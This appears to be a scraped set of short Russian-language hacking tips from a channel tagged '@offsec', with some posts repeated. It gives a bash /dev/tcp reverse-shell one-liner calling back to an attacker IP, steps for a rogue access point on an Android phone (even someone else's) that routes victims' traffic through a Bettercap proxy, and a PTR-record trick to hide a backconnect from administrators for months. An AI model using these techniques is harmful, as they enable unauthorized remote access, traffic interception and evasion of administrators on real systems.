⭐️ Данный метод должен знать каждый уважающий себя безопасник.
Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:
(c) @offsec
#backconnect #pentest #hacks
Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:
bash -i >& /dev/tcp/<hacker-ip>/<port> 0>&1
(c) @offsec
#backconnect #pentest #hacks
Когда нужно быстро развернуть фейковую точку доступа, но на руках только андроид телефон (даже чужой):
1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер
(C) @offsec
#mitm #proxy #pentest #hacks
1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер
(C) @offsec
#mitm #proxy #pentest #hacks
Как без лишних заморочек замаскировать свой бэкконнект от невнимательного администратора:
в PTR-записи прописать
Отдельное спасибо Никсу за такой топовый совет👍
#hacks #backconnect #masquerade #pentest
в PTR-записи прописать
localhost.localhost
, что позволит при выводе команд (lsof -i tcp/netstat -alt/ss -pnt
) замаскировать коннект в виде - hostname.localdomain->localhost.localhost:https (ESTABLISHED)
. На практике такие подключения могут жить месяцами, а то и больше.Отдельное спасибо Никсу за такой топовый совет👍
#hacks #backconnect #masquerade #pentest